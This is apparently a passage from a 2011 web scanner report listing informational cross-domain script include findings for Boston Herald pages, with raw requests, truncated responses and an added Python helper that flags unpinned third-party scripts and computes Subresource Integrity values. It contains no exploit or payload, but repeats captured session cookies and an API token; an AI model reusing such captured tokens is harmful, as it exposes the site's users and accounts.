Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:12:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.524. http://www.bostonherald.com/entertainment/health/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/health/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/health/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:13:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.625. http://www.bostonherald.com/entertainment/horoscope/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/horoscope/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/horoscope/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.626. http://www.bostonherald.com/entertainment/lifestyle/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/lifestyle/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/lifestyle/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:10:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

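The cross-domain script include entries above (18.616 through 18.626) all rest on the same observation: the response loads JavaScript from hosts other than www.bostonherald.com (cache.heraldinteractive.com, ajax.googleapis.com, edge.quantserve.com, pagead2.googlesyndication.com and others), so a compromise of any of those hosts runs code in the page's origin. The script below is an added example, not code from the crawler report or from any scanned site. It shows how the finding is derived (parse the response, resolve every script src against the page URL, keep those whose host differs) and the check a practitioner would want next: whether each cross-domain script is pinned with a Subresource Integrity value, plus the helper that computes that value. The sample HTML is constructed to resemble the excerpts above; the hosts commented.example and cdn.example and the LIB_JS body are hypothetical.

```python
"""Added example for the cross-domain script include findings above; this is
not code from the crawler report or from the sites it scanned."""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptCollector(HTMLParser):
    """Record the attributes of every <script> tag that carries a src."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            attributes = {name: (value or "") for name, value in attrs}
            if "src" in attributes:
                self.scripts.append(attributes)


def cross_domain_scripts(page_url, html):
    """Return [(absolute_src, has_integrity)] for every script the page loads
    from a host other than its own, in document order.

    Relative and protocol-relative src values are resolved against page_url.
    Scripts inside HTML comments are never fetched by the browser and are
    skipped by HTMLParser as well. Hosts are compared exactly, which is what
    the scanner does; a stricter policy would compare registrable domains.
    """
    page_host = (urlsplit(page_url).hostname or "").lower()
    collector = _ScriptCollector()
    collector.feed(html)
    found = []
    for attributes in collector.scripts:
        src = urljoin(page_url, attributes["src"].strip())
        host = (urlsplit(src).hostname or "").lower()
        if host and host != page_host:
            found.append((src, bool(attributes.get("integrity"))))
    return found


def sri_value(script_bytes):
    """Subresource Integrity value (sha384) that pins one script body."""
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def sri_matches(script_bytes, integrity):
    """True when a fetched script body matches a single sha384 integrity value
    (SRI also allows sha256/sha512 and several space-separated values)."""
    return sri_value(script_bytes) == integrity


# Constructed sample data, modelled on the response excerpts in this report.
# commented.example and cdn.example are hypothetical hosts.
PAGE_URL = "http://www.bostonherald.com/business/womens/"
LIB_JS = b"console.log('lib');\n"  # constructed body of the pinned script
SAMPLE_HTML = f"""<html><head>
<!-- // subsection_alt_beta
<script src="http://commented.example/out.js"></script>
-->
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="/js/site.js" type="text/javascript"></script>
<script type="text/javascript">var inline = 1;</script>
<script type="text/javascript"
src="//edge.quantserve.com/quant.js">
</script>
<script src="https://cdn.example/lib.js"
        integrity="{sri_value(LIB_JS)}" crossorigin="anonymous"></script>
</head><body></body></html>"""


if __name__ == "__main__":
    for src, pinned in cross_domain_scripts(PAGE_URL, SAMPLE_HTML):
        print(("pinned  " if pinned else "UNPINNED") + "  " + src)
    print("lib.js matches its integrity value:", sri_matches(LIB_JS, sri_value(LIB_JS)))
```

Run against a saved response body, the first function reproduces the scanner's list for that page; the `has_integrity` flag separates includes that a browser would refuse to run if the third-party host served different bytes from those it would execute unconditionally. Pinning with `sri_value` only works for scripts whose content is fixed; ad and analytics loaders such as show_ads.js and quant.js change without notice, so for those the realistic controls are a Content-Security-Policy `script-src` allow-list and a decision about whether the host is trusted at all.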
18.627. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:09:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.628. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:08:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 50051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.629. http://www.bostonherald.com/entertainment/movies/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/movies/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!--//include 8 //-->
           

<script src='http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.630. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/movies/reviews/view.bg?articleid=1312518&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.631. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 HTTP/1.1
